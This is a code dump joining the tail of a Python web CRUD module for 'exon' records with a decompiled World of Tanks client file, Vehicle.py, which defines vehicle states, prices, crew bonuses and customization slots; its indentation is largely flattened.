html += ' <a class="btn btn-xs btn-danger" href="/exon/delete/%s" onclick="return confirm(\'Are you really want to delete this?\')">Delete</a>' % (row['id'])
html += '</div>'
return html
def create_table(self):
table = widgets.table.DataTable()
table.set_title('Exon')
table.set_subtitle('List of exon')
# table.create_button('create', '/exon/create', 'zmdi-plus')
table.create_column('id', 'ID', '10%', sortable=True)
table.create_column('code', 'Code', '60%')
table.create_column('actions', '', '14%')
table.add_field(widgets.field.Textbox('text'))
table.add_field(widgets.field.Combobox('is_good_quality', choices=constants.FILTER))
table.renderer = self.TableRenderer()
table.renderer.table_form_renderer = renderers.widgets.form.TableFormRenderer()
table.renderer.table_form_renderer.add_field('text', 'Search', colspan=8)
table.renderer.table_form_renderer.add_field('is_good_quality', 'Quality', colspan=4)
table.renderer.table_form_renderer.set_field_renderer('textbox', renderers.widgets.field.TextboxRenderer())
table.renderer.table_form_renderer.set_field_renderer('combobox', renderers.widgets.field.ComboboxRenderer())
return table
def load_table_data(self, table_form_data, sortkey, sortdir, page_number):
return components.PageStore(self.get_container()).list(table_form_data, sortkey, sortdir, page_number)
class Update(actions.crud.FormAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class PageUpdateRenderer(renderers.page_update.PageUpdateRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.PageUpdateRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).get(self.params['code'])
def GET(self):
page_context = self.create_page_context()
table_widget = self.create_table()
data = self.load_table_data()
data['page_id'] = 'exon'
table_widget.set_data(data)
page_context.add_widget(table_widget)
return HttpResponse(page_context.render())
class History(actions.crud.FormAction):
class HistoryRenderer(renderers.page_update.HistoryRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.HistoryRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).history(self.params['code'], self.params['field'])
def GET(self):
page_context = renderers.page_update.HistoryRenderer()
table_widget = self.create_table()
record = self.load_table_data()
data = {}
data['data'] = record
data['text'] = {'field': self.params['field'], 'code': self.params['code']}
return HttpResponse(page_context.render(data))
class Delete(actions.crud.DeleteAction):
def GET(self):
result = components.PageStore(self.get_container()).delete(self.params['id'])
return HttpResponseRedirect('/exon/list')
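# Routing note (assumption inferred from the hrefs above): these actions appear
# to be mounted at /exon/list, /exon/update/<code>, /exon/history/<code>/<field>
# and /exon/delete/<id>.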
# ---- File: /source/res/scripts/client/gui/shared/gui_items/Vehicle.py (repo: TrenSeP/WorldOfTanks-Decompiled) ----
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/shared/gui_items/Vehicle.py
import math
import random
from copy import copy
from itertools import izip
from operator import itemgetter
from collections import namedtuple
import BigWorld
import constants
from AccountCommands import LOCK_REASON, VEHICLE_SETTINGS_FLAG
from account_shared import LayoutIterator
from constants import WIN_XP_FACTOR_MODE, RentType
from gui.impl.gen import R
from rent_common import parseRentID
from gui import makeHtmlString
from gui.Scaleform.genConsts.STORE_CONSTANTS import STORE_CONSTANTS
from gui.Scaleform.locale.ITEM_TYPES import ITEM_TYPES
from gui.Scaleform.locale.RES_ICONS import RES_ICONS
from gui.Scaleform.locale.RES_SHOP_EXT import RES_SHOP_EXT
from gui.prb_control import prb_getters, prbDispatcherProperty
from gui.prb_control.settings import PREBATTLE_SETTING_NAME
from gui.shared.economics import calcRentPackages, getActionPrc, calcVehicleRestorePrice
from gui.shared.formatters import text_styles
from gui.shared.gui_items import CLAN_LOCK, GUI_ITEM_TYPE, getItemIconName, GUI_ITEM_ECONOMY_CODE
from gui.shared.gui_items.customization.slots import ProjectionDecalSlot, BaseCustomizationSlot, EmblemSlot
from gui.shared.gui_items.customization.slots import ANCHOR_TYPE_TO_SLOT_TYPE_MAP
from gui.shared.gui_items.customization.outfit import Area, REGIONS_BY_SLOT_TYPE
from gui.shared.gui_items.vehicle_equipment import VehicleEquipment
from gui.shared.gui_items.gui_item import HasStrCD
from gui.shared.gui_items.fitting_item import FittingItem, RentalInfoProvider
from gui.shared.gui_items.Tankman import Tankman
from gui.shared.money import MONEY_UNDEFINED, Currency, Money
from gui.shared.gui_items.gui_item_economics import ItemPrice, ItemPrices, ITEM_PRICE_EMPTY
from gui.shared.utils import makeSearchableString
from helpers import i18n, time_utils, dependency, func_utils
from items import vehicles, tankmen, customizations, getTypeInfoByName, getTypeOfCompactDescr, makeIntCompactDescrByID
from items.components.c11n_constants import SeasonType, CustomizationType, StyleFlags, HIDDEN_CAMOUFLAGE_ID
from shared_utils import findFirst, CONST_CONTAINER
from skeletons.gui.game_control import IIGRController, IRentalsController
from skeletons.gui.lobby_context import ILobbyContext
from skeletons.gui.server_events import IEventsCache
from debug_utils import LOG_ERROR
class VEHICLE_CLASS_NAME(CONST_CONTAINER):
LIGHT_TANK = 'lightTank'
MEDIUM_TANK = 'mediumTank'
HEAVY_TANK = 'heavyTank'
SPG = 'SPG'
AT_SPG = 'AT-SPG'
VEHICLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.SPG)
EmblemSlotHelper = namedtuple('EmblemSlotHelper', ['tankAreaSlot', 'tankAreaId'])
SlotHelper = namedtuple('SlotHelper', ['tankAreaSlot', 'tankAreaId'])
VEHICLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TYPES_ORDER)))
UNKNOWN_VEHICLE_CLASS_ORDER = 100
def compareByVehTypeName(vehTypeA, vehTypeB):
return VEHICLE_TYPES_ORDER_INDICES[vehTypeA] - VEHICLE_TYPES_ORDER_INDICES[vehTypeB]
def compareByVehTableTypeName(vehTypeA, vehTypeB):
return VEHICLE_TABLE_TYPES_ORDER_INDICES[vehTypeA] - VEHICLE_TABLE_TYPES_ORDER_INDICES[vehTypeB]
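# Illustrative sketch (Python 2 semantics): these cmp-style helpers order class
# names by the order tuples above, e.g.
#   sorted(['SPG', 'lightTank'], cmp=compareByVehTypeName)  # -> ['lightTank', 'SPG']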
VEHICLE_TABLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_TABLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TABLE_TYPES_ORDER)))
VEHICLE_TABLE_TYPES_ORDER_INDICES_REVERSED = dict(((n, i) for i, n in enumerate(reversed(VEHICLE_TABLE_TYPES_ORDER))))
VEHICLE_BATTLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
VEHICLE_CLASS_NAME.MEDIUM_TANK,
VEHICLE_CLASS_NAME.AT_SPG,
VEHICLE_CLASS_NAME.LIGHT_TANK,
VEHICLE_CLASS_NAME.SPG)
VEHICLE_BATTLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_BATTLE_TYPES_ORDER)))
class VEHICLE_TAGS(CONST_CONTAINER):
PREMIUM = 'premium'
PREMIUM_IGR = 'premiumIGR'
CANNOT_BE_SOLD = 'cannot_be_sold'
SECRET = 'secret'
SPECIAL = 'special'
OBSERVER = 'observer'
DISABLED_IN_ROAMING = 'disabledInRoaming'
EVENT = 'event_battles'
EXCLUDED_FROM_SANDBOX = 'excluded_from_sandbox'
TELECOM = 'telecom'
UNRECOVERABLE = 'unrecoverable'
CREW_LOCKED = 'lockCrew'
OUTFIT_LOCKED = 'lockOutfit'
EPIC_BATTLES = 'epic_battles'
RENT_PROMOTION = 'rent_promotion'
_NOT_FULL_AMMO_MULTIPLIER = 0.2
_MAX_RENT_MULTIPLIER = 2
RentPackagesInfo = namedtuple('RentPackagesInfo', ('hasAvailableRentPackages', 'mainRentType', 'seasonType'))
class Vehicle(FittingItem, HasStrCD):
__slots__ = ('__customState', '_inventoryID', '_xp', '_dailyXPFactor', '_isElite', '_isFullyElite', '_clanLock', '_isUnique', '_rentPackages', '_rentPackagesInfo', '_isDisabledForBuy', '_isSelected', '_restorePrice', '_canTradeIn', '_canTradeOff', '_tradeOffPriceFactor', '_tradeOffPrice', '_searchableUserName', '_personalDiscountPrice', '_rotationGroupNum', '_rotationBattlesLeft', '_isRotationGroupLocked', '_isInfiniteRotationGroup', '_settings', '_lock', '_repairCost', '_health', '_gun', '_turret', '_engine', '_chassis', '_radio', '_fuelTank', '_optDevices', '_shells', '_equipment', '_equipmentLayout', '_bonuses', '_crewIndices', '_slotsIds', '_crew', '_lastCrew', '_hasModulesToSelect', '_customOutfits', '_styledOutfits', '_slotsAnchors')
class VEHICLE_STATE(object):
DAMAGED = 'damaged'
EXPLODED = 'exploded'
DESTROYED = 'destroyed'
UNDAMAGED = 'undamaged'
BATTLE = 'battle'
IN_PREBATTLE = 'inPrebattle'
LOCKED = 'locked'
CREW_NOT_FULL = 'crewNotFull'
AMMO_NOT_FULL = 'ammoNotFull'
AMMO_NOT_FULL_EVENTS = 'ammoNotFullEvents'
SERVER_RESTRICTION = 'serverRestriction'
RENTAL_IS_OVER = 'rentalIsOver'
IGR_RENTAL_IS_OVER = 'igrRentalIsOver'
IN_PREMIUM_IGR_ONLY = 'inPremiumIgrOnly'
GROUP_IS_NOT_READY = 'group_is_not_ready'
NOT_PRESENT = 'notpresent'
UNAVAILABLE = 'unavailable'
UNSUITABLE_TO_QUEUE = 'unsuitableToQueue'
UNSUITABLE_TO_UNIT = 'unsuitableToUnit'
CUSTOM = (UNSUITABLE_TO_QUEUE, UNSUITABLE_TO_UNIT)
DEAL_IS_OVER = 'dealIsOver'
ROTATION_GROUP_UNLOCKED = 'rotationGroupUnlocked'
ROTATION_GROUP_LOCKED = 'rotationGroupLocked'
RENTABLE = 'rentable'
RENTABLE_AGAIN = 'rentableAgain'
CAN_SELL_STATES = [VEHICLE_STATE.UNDAMAGED,
VEHICLE_STATE.CREW_NOT_FULL,
VEHICLE_STATE.AMMO_NOT_FULL,
VEHICLE_STATE.GROUP_IS_NOT_READY,
VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
VEHICLE_STATE.UNSUITABLE_TO_UNIT,
VEHICLE_STATE.ROTATION_GROUP_UNLOCKED,
VEHICLE_STATE.ROTATION_GROUP_LOCKED]
GROUP_STATES = [VEHICLE_STATE.GROUP_IS_NOT_READY]
class VEHICLE_STATE_LEVEL(object):
CRITICAL = 'critical'
INFO = 'info'
WARNING = 'warning'
RENTED = 'rented'
RENTABLE = 'rentableBlub'
igrCtrl = dependency.descriptor(IIGRController)
eventsCache = dependency.descriptor(IEventsCache)
lobbyContext = dependency.descriptor(ILobbyContext)
rentalsController = dependency.descriptor(IRentalsController)
def __init__(self, strCompactDescr=None, inventoryID=-1, typeCompDescr=None, proxy=None):
if strCompactDescr is not None:
vehDescr = vehicles.VehicleDescr(compactDescr=strCompactDescr)
else:
_, nID, innID = vehicles.parseIntCompactDescr(typeCompDescr)
vehDescr = vehicles.VehicleDescr(typeID=(nID, innID))
HasStrCD.__init__(self, strCompactDescr)
FittingItem.__init__(self, vehDescr.type.compactDescr, proxy)
self._descriptor = vehDescr
self._inventoryID = inventoryID
self._xp = 0
self._dailyXPFactor = -1
self._isElite = False
self._isFullyElite = False
self._clanLock = 0
self._isUnique = self.isHidden
self._rentPackages = []
self._rentPackagesInfo = RentPackagesInfo(False, None, None)
self._isDisabledForBuy = False
self._isSelected = False
self._restorePrice = None
self._canTradeIn = False
self._canTradeOff = False
self._tradeOffPriceFactor = 0
self._tradeOffPrice = MONEY_UNDEFINED
self._rotationGroupNum = 0
self._rotationBattlesLeft = 0
self._isRotationGroupLocked = False
self._isInfiniteRotationGroup = False
self._unlockedBy = []
self._customOutfits = {}
self._styledOutfits = {}
if self.isPremiumIGR:
self._searchableUserName = makeSearchableString(self.shortUserName)
else:
self._searchableUserName = makeSearchableString(self.userName)
invData = dict()
tradeInData = None
if proxy is not None and proxy.inventory.isSynced() and proxy.stats.isSynced() and proxy.shop.isSynced() and proxy.vehicleRotation.isSynced() and proxy.recycleBin.isSynced():
invDataTmp = proxy.inventory.getItems(GUI_ITEM_TYPE.VEHICLE, inventoryID)
if invDataTmp is not None:
invData = invDataTmp
tradeInData = proxy.shop.tradeIn
self._xp = proxy.stats.vehiclesXPs.get(self.intCD, self._xp)
if proxy.shop.winXPFactorMode == WIN_XP_FACTOR_MODE.ALWAYS or self.intCD not in proxy.stats.multipliedVehicles and not self.isOnlyForEventBattles:
self._dailyXPFactor = proxy.shop.dailyXPFactor
self._isElite = not vehDescr.type.unlocksDescrs or self.intCD in proxy.stats.eliteVehicles
self._isFullyElite = self.isElite and not any((data[1] not in proxy.stats.unlocks for data in vehDescr.type.unlocksDescrs))
clanDamageLock = proxy.stats.vehicleTypeLocks.get(self.intCD, {}).get(CLAN_LOCK, 0)
clanNewbieLock = proxy.stats.globalVehicleLocks.get(CLAN_LOCK, 0)
self._clanLock = clanDamageLock or clanNewbieLock
self._isDisabledForBuy = self.intCD in proxy.shop.getNotToBuyVehicles()
invRentData = invData.get('rent')
if invRentData is not None:
self._rentInfo = RentalInfoProvider(isRented=True, *invRentData)
hasAvailableRentPackages, mainRentType, seasonType = self.rentalsController.getRentPackagesInfo(proxy.shop.getVehicleRentPrices().get(self.intCD, {}), self._rentInfo)
self._rentPackagesInfo = RentPackagesInfo(hasAvailableRentPackages, mainRentType, seasonType)
self._isSelected = bool(self.invID in proxy.stats.oldVehInvIDs)
self._customOutfits = self._parseCustomOutfits(self.intCD, proxy, self.descriptor.type.hasCustomDefaultCamouflage)
self._styledOutfits = self._parseStyledOutfits(self.intCD, proxy)
restoreConfig = proxy.shop.vehiclesRestoreConfig
self._restorePrice = calcVehicleRestorePrice(self.buyPrices.itemPrice.defPrice, proxy.shop)
self._restoreInfo = proxy.recycleBin.getVehicleRestoreInfo(self.intCD, restoreConfig.restoreDuration, restoreConfig.restoreCooldown)
self._personalDiscountPrice = proxy.shop.getPersonalVehicleDiscountPrice(self.intCD)
self._rotationGroupNum = proxy.vehicleRotation.getGroupNum(self.intCD)
self._rotationBattlesLeft = proxy.vehicleRotation.getBattlesCount(self.rotationGroupNum)
self._isRotationGroupLocked = proxy.vehicleRotation.isGroupLocked(self.rotationGroupNum)
self._isInfiniteRotationGroup = proxy.vehicleRotation.isInfinite(self.rotationGroupNum)
self._unlockedBy = proxy.vehicleRotation.unlockedBy(self.rotationGroupNum)
self._inventoryCount = 1 if invData.keys() else 0
self._settings = invData.get('settings', 0)
self._lock = invData.get('lock', (0, 0))
self._repairCost, self._health = invData.get('repair', (0, 0))
self._gun = self.itemsFactory.createVehicleGun(vehDescr.gun.compactDescr, proxy, vehDescr.gun)
self._turret = self.itemsFactory.createVehicleTurret(vehDescr.turret.compactDescr, proxy, vehDescr.turret)
self._engine = self.itemsFactory.createVehicleEngine(vehDescr.engine.compactDescr, proxy, vehDescr.engine)
self._chassis = self.itemsFactory.createVehicleChassis(vehDescr.chassis.compactDescr, proxy, vehDescr.chassis)
self._radio = self.itemsFactory.createVehicleRadio(vehDescr.radio.compactDescr, proxy, vehDescr.radio)
self._fuelTank = self.itemsFactory.createVehicleFuelTank(vehDescr.fuelTank.compactDescr, proxy, vehDescr.fuelTank)
sellPrice = self._calcSellPrice(proxy)
defaultSellPrice = self._calcDefaultSellPrice(proxy)
self._sellPrices = ItemPrices(itemPrice=ItemPrice(price=sellPrice, defPrice=defaultSellPrice), itemAltPrice=ITEM_PRICE_EMPTY)
if tradeInData is not None and tradeInData.isEnabled and self.isPremium and not self.isPremiumIGR:
self._tradeOffPriceFactor = tradeInData.sellPriceFactor
tradeInLevels = tradeInData.allowedVehicleLevels
self._canTradeIn = not self.isInInventory and not self.isHidden and self.isUnlocked and not self.isRestorePossible() and self.level in tradeInLevels and not self.isRented
self._canTradeOff = self.isPurchased and not self.canNotBeSold and self.intCD not in tradeInData.forbiddenVehicles and self.level in tradeInLevels
if self.canTradeOff:
self._tradeOffPrice = Money(gold=int(math.ceil(self.tradeOffPriceFactor * self.buyPrices.itemPrice.price.gold)))
self._optDevices = self._parserOptDevs(vehDescr.optionalDevices, proxy)
gunAmmoLayout = []
for shell in self.gun.defaultAmmo:
gunAmmoLayout += (shell.intCD, shell.defaultCount)
self._shells = self._parseShells(invData.get('shells', list()), invData.get('shellsLayout', dict()).get(self.shellsLayoutIdx, gunAmmoLayout), proxy)
self._equipment = VehicleEquipment(proxy, invData.get('eqs'))
self._equipmentLayout = VehicleEquipment(proxy, invData.get('eqsLayout'))
defaultCrew = [None] * len(vehDescr.type.crewRoles)
crewList = invData.get('crew', defaultCrew)
self._bonuses = self._calcCrewBonuses(crewList, proxy)
self._crewIndices = dict([ (invID, idx) for idx, invID in enumerate(crewList) ])
self._crew = self._buildCrew(crewList, proxy)
self._lastCrew = invData.get('lastCrew')
self._rentPackages = calcRentPackages(self, proxy, self.rentalsController)
self._maxRentDuration, self._minRentDuration = self.__calcMinMaxRentDuration()
self._hasModulesToSelect = self.__hasModulesToSelect()
self.__customState = ''
self._slotsAnchorsById, self._slotsAnchors = self.__initAnchors()
return
def __initAnchors(self):
vehDescr = self._descriptor
slotsAnchors = {cType:{area:{} for area in Area.ALL} for cType in GUI_ITEM_TYPE.CUSTOMIZATIONS}
slotsAnchorsById = {}
hullEmblemSlots = EmblemSlotHelper(vehDescr.hull.emblemSlots, Area.HULL)
if vehDescr.turret.showEmblemsOnGun:
turretEmblemSlots = EmblemSlotHelper(vehDescr.turret.emblemSlots, Area.GUN)
else:
turretEmblemSlots = EmblemSlotHelper(vehDescr.turret.emblemSlots, Area.TURRET)
for emblemSlotHelper in (hullEmblemSlots, turretEmblemSlots):
for emblemSlot in emblemSlotHelper.tankAreaSlot:
areaId = emblemSlotHelper.tankAreaId
slotType = ANCHOR_TYPE_TO_SLOT_TYPE_MAP.get(emblemSlot.type, None)
if slotType is not None:
regionIdx = len(slotsAnchors[slotType][areaId])
slot = EmblemSlot(emblemSlot, emblemSlotHelper.tankAreaId, regionIdx)
slotsAnchors[slotType][areaId][regionIdx] = slot
slotsAnchorsById[emblemSlot.slotId] = slot
chassisCustomizationSlots = SlotHelper(vehDescr.chassis.slotsAnchors, Area.CHASSIS)
hullCustomizationSlots = SlotHelper(vehDescr.hull.slotsAnchors, Area.HULL)
turretCustomizationSlots = SlotHelper(vehDescr.turret.slotsAnchors, Area.TURRET)
gunCustomizationSlots = SlotHelper(vehDescr.gun.slotsAnchors, Area.GUN)
for slotHelper in (chassisCustomizationSlots,
hullCustomizationSlots,
turretCustomizationSlots,
gunCustomizationSlots):
for slotsAnchor in slotHelper.tankAreaSlot:
slotType = ANCHOR_TYPE_TO_SLOT_TYPE_MAP.get(slotsAnchor.type, None)
if slotType is not None:
if slotType in (GUI_ITEM_TYPE.PROJECTION_DECAL, GUI_ITEM_TYPE.MODIFICATION, GUI_ITEM_TYPE.STYLE):
areaId = Area.MISC
else:
areaId = slotHelper.tankAreaId
if slotsAnchor.applyTo is not None:
regionIdx = -1
if slotType in REGIONS_BY_SLOT_TYPE[areaId]:
regions = REGIONS_BY_SLOT_TYPE[areaId][slotType]
regionIdx = next((i for i, region in enumerate(regions) if slotsAnchor.applyTo == region), -1)
else:
regionIdx = len(slotsAnchors[slotType][areaId])
if regionIdx == -1:
continue
if slotType == GUI_ITEM_TYPE.PROJECTION_DECAL:
customizationSlot = ProjectionDecalSlot(slotsAnchor, slotHelper.tankAreaId, regionIdx)
else:
customizationSlot = BaseCustomizationSlot(slotsAnchor, slotHelper.tankAreaId, regionIdx)
slotsAnchors[slotType][areaId][regionIdx] = customizationSlot
slotsAnchorsById[customizationSlot.slotId] = customizationSlot
if not slotsAnchors[GUI_ITEM_TYPE.MODIFICATION][Area.MISC]:
slotsAnchors[GUI_ITEM_TYPE.MODIFICATION][Area.MISC] = slotsAnchors[GUI_ITEM_TYPE.STYLE][Area.MISC]
for slot in slotsAnchors[GUI_ITEM_TYPE.PROJECTION_DECAL][Area.MISC].itervalues():
if slot.isChild:
parent = slotsAnchorsById[slot.parentSlotId]
parent.addChild(slot)
return (slotsAnchorsById, slotsAnchors)
def getAnchors(self, slotType, areaId):
return copy(self._slotsAnchors[slotType][areaId])
def getAnchorBySlotId(self, slotType, areaId, regionIdx):
return self._slotsAnchors[slotType][areaId].get(regionIdx, None)
def getAnchorById(self, anchorId):
return self._slotsAnchorsById.get(anchorId, None)
@property
def buyPrices(self):
currency = self._buyPrices.itemPrice.price.getCurrency()
if self._personalDiscountPrice is not None and self._personalDiscountPrice.get(currency) <= self._buyPrices.itemPrice.price.get(currency):
currentPrice = self._personalDiscountPrice
else:
currentPrice = self._buyPrices.itemPrice.price
buyPrice = currentPrice
if self.isRented and not self.rentalIsOver:
if currency == self.rentCompensation.getCurrency():
buyPrice = currentPrice - self.rentCompensation
else:
LOG_ERROR('Compensation currency and purchase currency do not match')
return ItemPrices(itemPrice=ItemPrice(price=buyPrice, defPrice=self._buyPrices.itemPrice.defPrice), itemAltPrice=self._buyPrices.itemAltPrice)
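    # Illustration (figures assumed): a rented vehicle listed at 7500 gold with
    # 2500 gold of rent compensation is offered for 5000 gold, while defPrice is
    # left untouched so discount displays still compare against the list price.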
@property
def searchableUserName(self):
return self._searchableUserName
@property
def searchableShortUserName(self):
return makeSearchableString(self.shortUserName)
def getUnlockDescrByIntCD(self, intCD):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
if intCD == data[1]:
return (unlockIdx, data[0], set(data[2:]))
return (-1, 0, set())
def _calcSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.price
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.price
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.price
price = price + modulePrice
return price
def _getDescriptor(self):
return None
def _calcDefaultSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.defPrice
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price + modulePrice
return price
def _calcCrewBonuses(self, crew, proxy):
bonuses = dict()
bonuses['equipment'] = 0.0
for eq in self.equipment.regularConsumables.getInstalledItems():
bonuses['equipment'] += eq.crewLevelIncrease
for battleBooster in self.equipment.battleBoosterConsumables.getInstalledItems():
bonuses['equipment'] += battleBooster.getCrewBonus(self)
bonuses['optDevices'] = self.descriptor.miscAttrs['crewLevelIncrease']
bonuses['commander'] = 0
commanderEffRoleLevel = 0
bonuses['brotherhood'] = tankmen.getSkillsConfig().getSkill('brotherhood').crewLevelIncrease
for tankmanID in crew:
if tankmanID is None:
bonuses['brotherhood'] = 0.0
continue
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
if not tmanInvData:
continue
tdescr = tankmen.TankmanDescr(compactDescr=tmanInvData['compDescr'])
if 'brotherhood' not in tdescr.skills or tdescr.skills.index('brotherhood') == len(tdescr.skills) - 1 and tdescr.lastSkillLevel != tankmen.MAX_SKILL_LEVEL:
bonuses['brotherhood'] = 0.0
if tdescr.role == Tankman.ROLES.COMMANDER:
factor, addition = tdescr.efficiencyOnVehicle(self.descriptor)
commanderEffRoleLevel = round(tdescr.roleLevel * factor + addition)
bonuses['commander'] += round((commanderEffRoleLevel + bonuses['brotherhood'] + bonuses['equipment']) / tankmen.COMMANDER_ADDITION_RATIO)
return bonuses
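    # Rough magnitudes (illustrative, values assumed): a 100%-effective commander
    # with full brotherhood (+5) and crew-boosting equipment (+5) yields
    # bonuses['commander'] = round((100 + 5 + 5) / tankmen.COMMANDER_ADDITION_RATIO),
    # which is then shared with the rest of the crew.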
def _buildCrew(self, crew, proxy):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, tankmanID in enumerate(crew):
tankman = None
if tankmanID is not None:
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
tankman = self.itemsFactory.createTankman(strCompactDescr=tmanInvData['compDescr'], inventoryID=tankmanID, vehicle=self, proxy=proxy)
crewItems.append((idx, tankman))
return sortCrew(crewItems, crewRoles)
@staticmethod
def __crewSort(t1, t2):
return 0 if t1 is None or t2 is None else t1.__cmp__(t2)
def _parseCompDescr(self, compactDescr):
nId, innID = vehicles.parseVehicleCompactDescr(compactDescr)
return (GUI_ITEM_TYPE.VEHICLE, nId, innID)
def _parseShells(self, layoutList, defaultLayoutList, proxy):
shellsDict = dict(((cd, count) for cd, count, _ in LayoutIterator(layoutList)))
defaultsDict = dict(((cd, (count, isBoughtForCredits)) for cd, count, isBoughtForCredits in LayoutIterator(defaultLayoutList)))
layoutList = list(layoutList)
for shot in self.descriptor.gun.shots:
cd = shot.shell.compactDescr
if cd not in shellsDict:
layoutList.extend([cd, 0])
result = list()
for intCD, count, _ in LayoutIterator(layoutList):
defaultCount, isBoughtForCredits = defaultsDict.get(intCD, (0, False))
result.append(self.itemsFactory.createShell(intCD, count, defaultCount, proxy, isBoughtForCredits))
return result
@classmethod
def _parseCustomOutfits(cls, compactDescr, proxy, hasDefaultCamouflage=False):
outfits = {}
for season in SeasonType.SEASONS:
outfitData = proxy.inventory.getOutfitData(compactDescr, season)
if outfitData:
outfits[season] = cls.itemsFactory.createOutfit(strCompactDescr=outfitData.compDescr, isEnabled=bool(outfitData.flags & StyleFlags.ENABLED), isInstalled=bool(outfitData.flags & StyleFlags.INSTALLED), proxy=proxy)
            elif hasDefaultCamouflage:
                outfit = cls.itemsFactory.createOutfit(isInstalled=True, isEnabled=True)
                hiddenCamoCD = makeIntCompactDescrByID('customizationItem', CustomizationType.CAMOUFLAGE, HIDDEN_CAMOUFLAGE_ID)
                camo = cls.itemsFactory.createCustomization(hiddenCamoCD)
                outfit.hull.slotFor(GUI_ITEM_TYPE.CAMOUFLAGE).set(camo)
                outfits[season] = outfit
            else:
                outfits[season] = cls.itemsFactory.createOutfit()
return outfits
@classmethod
def _parseStyledOutfits(cls, compactDescr, proxy):
outfits = {}
outfitData = proxy.inventory.getOutfitData(compactDescr, SeasonType.ALL)
if not outfitData or not bool(outfitData.flags & StyleFlags.ENABLED):
return outfits
component = customizations.parseCompDescr(outfitData.compDescr)
styleIntCD = vehicles.makeIntCompactDescrByID('customizationItem', CustomizationType.STYLE, component.styleId)
style = vehicles.getItemByCompactDescr(styleIntCD)
for styleSeason in SeasonType.SEASONS:
outfitComp = style.outfits.get(styleSeason)
outfits[styleSeason] = cls.itemsFactory.createOutfit(component=outfitComp, isEnabled=bool(outfitData.flags & StyleFlags.ENABLED), isInstalled=bool(outfitData.flags & StyleFlags.INSTALLED), proxy=proxy)
return outfits
@classmethod
def _parserOptDevs(cls, layoutList, proxy):
result = list()
for i in xrange(len(layoutList)):
optDevDescr = layoutList[i]
result.append(cls.itemsFactory.createOptionalDevice(optDevDescr.compactDescr, proxy) if optDevDescr is not None else None)
return result
@property
def iconContour(self):
return getContourIconPath(self.name)
@property
def iconUnique(self):
return getUniqueIconPath(self.name, withLightning=False)
@property
def iconUniqueLight(self):
return getUniqueIconPath(self.name, withLightning=True)
def getShopIcon(self, size=STORE_CONSTANTS.ICON_SIZE_MEDIUM):
name = getNationLessName(self.name)
return RES_SHOP_EXT.getVehicleIcon(size, name)
@property
def shellsLayoutIdx(self):
return (self.turret.descriptor.compactDescr, self.gun.descriptor.compactDescr)
@property
def invID(self):
return self._inventoryID
@property
def xp(self):
return self._xp
@property
def dailyXPFactor(self):
return self._dailyXPFactor
@property
def isElite(self):
return self._isElite
@property
def isFullyElite(self):
return self._isFullyElite
@property
def clanLock(self):
return self._clanLock
@property
def isUnique(self):
return self._isUnique
@property
def rentPackages(self):
return self._rentPackages
@property
def hasRentPackages(self):
return self._rentPackagesInfo.hasAvailableRentPackages
@property
def getRentPackagesInfo(self):
return self._rentPackagesInfo
@property
def isDisabledForBuy(self):
return self._isDisabledForBuy
@property
def isSelected(self):
return self._isSelected
@property
def restorePrice(self):
return self._restorePrice
@property
def canTradeIn(self):
return self._canTradeIn
@property
def canTradeOff(self):
return self._canTradeOff
@property
def tradeOffPriceFactor(self):
return self._tradeOffPriceFactor
@property
def tradeOffPrice(self):
return self._tradeOffPrice
@property
def rotationGroupNum(self):
return self._rotationGroupNum
@property
def rotationBattlesLeft(self):
return self._rotationBattlesLeft
@property
def isRotationGroupLocked(self):
return self._isRotationGroupLocked
@property
def unlockedBy(self):
return self._unlockedBy
@property
def isInfiniteRotationGroup(self):
return self._isInfiniteRotationGroup
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, value):
self._settings = value
@property
def lock(self):
return self._lock
@property
def repairCost(self):
return self._repairCost
@property
def health(self):
return self._health
@property
def gun(self):
return self._gun
@gun.setter
def gun(self, value):
self._gun = value
@property
def turret(self):
return self._turret
@turret.setter
def turret(self, value):
self._turret = value
@property
def engine(self):
return self._engine
@engine.setter
def engine(self, value):
self._engine = value
@property
def chassis(self):
return self._chassis
@chassis.setter
def chassis(self, value):
self._chassis = value
@property
def radio(self):
return self._radio
@radio.setter
def radio(self, value):
self._radio = value
@property
def fuelTank(self):
return self._fuelTank
